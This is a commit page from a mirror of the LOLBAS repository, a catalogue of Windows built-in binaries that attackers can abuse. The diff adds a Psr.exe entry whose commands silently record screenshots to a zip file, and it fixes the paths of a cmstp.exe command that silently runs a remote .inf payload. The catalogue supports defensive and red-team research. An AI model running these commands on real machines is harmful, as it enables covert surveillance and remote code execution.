infosecn1nja
/
LOLBAS
mirror of https://github.com/infosecn1nja/LOLBAS.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/api0cradle/LOLBAS

master
api0cradle 2018-04-25 22:49:15 +02:00
parent cdd4e39fc5 1c477e5e4c
commit 103f02959e
4 changed files with 35 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
Contribute.md
View File

@ -4,7 +4,7 @@ to send me a tweet and I will add the contribution for you.
## Binary.exe
* Functions: Execute, Download, Copy, Read ADS, Write ADS, UACBypass, Search, Compile, Credentials
* Functions: Execute, Download, Copy, Read ADS, Write ADS, UACBypass, Search, Compile, Credentials, Surveillance
```
Example

1
LOLBins.md
View File

@ -37,6 +37,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
[Powershell.exe](OSBinaries/Powershell.md)
[Presentationhost.exe](OSBinaries/Presentationhost.md)
[Print.exe](OSBinaries/Print.md)
[Psr.exe](OSBinaries/Psr.md)
[Qprocess.exe](OSBinaries/Qprocess.md)
[Reg.exe](OSBinaries/Reg.md)
[Regedit.exe](OSBinaries/Regedit.md)

6
OSBinaries/Cmstp.md
View File

@ -5,7 +5,7 @@
```
cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payloads/Cmstp.inf
cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
```
Acknowledgements:
@ -13,8 +13,8 @@ Acknowledgements:
* Nick Tyrer - @NickTyrer
Code sample:
* [Cmstp.inf](https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payloads/Cmstp.inf)
* [Cmstp_calc.sct](https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payloads/Cmstp_calc.sct)
* [Cmstp.inf](https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf)
* [Cmstp_calc.sct](https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp_calc.sct)
Resources:
* https://twitter.com/NickTyrer/status/958450014111633408

30
OSBinaries/Psr.md Normal file
View File

@ -0,0 +1,30 @@
## Psr.exe
* Functions: Surveillance
```
psr.exe /start /gui 0 /output c:\users\user\out.zip
psr.exe /stop
```
Acknowledgements:
*
Code sample:
*
Resources:
* https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
Full path:
```
C:\Windows\System32\Psr.exe
C:\Windows\SysWOW64\Psr.exe
```
Notes:
It does not log keystrokes. Only screenshots when something is clicked.